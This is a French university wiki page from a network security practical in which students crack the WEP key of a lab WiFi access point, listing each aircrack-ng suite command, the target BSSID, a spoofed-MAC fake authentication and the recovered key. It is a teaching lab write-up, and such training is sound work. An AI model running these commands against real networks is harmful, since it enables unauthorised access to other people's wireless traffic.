TP sysres IMA5 2021/2022 G4
De Wiki d'activités IMA
Révision datée du 11 octobre 2021 à 17:47 par Rbonvale (discussion | contributions) (→5.2 Cassage de clef WEP d’un point d’accès WiFi)
Tests D'intrusions
5.2 Cassage de clef WEP d’un point d’accès WiFi
On va tout d'abord récupérer le nom de notre interface réseau grâce à la commande :
airmon-ng
On sait donc maintenant que notre interface réseau s'appelle wlan0mon (renommé automatiquement parce que celui de base était trop long)
On démarre l'interface sur le channel 3 :
airmon-ng start wlan0mon 3
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP
airodump-ng wlan0mon
On réalise un test d'injection sur cracotte10
aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon
On récupère les VI générés par le point d'accès pour les stocker dans output :
airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon
On effectue de fausses authentifications
aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon
La clef WEP est décriptable :
aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap
Le résultat obtenu est le suivant :
KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] Decrypted correctly: 100%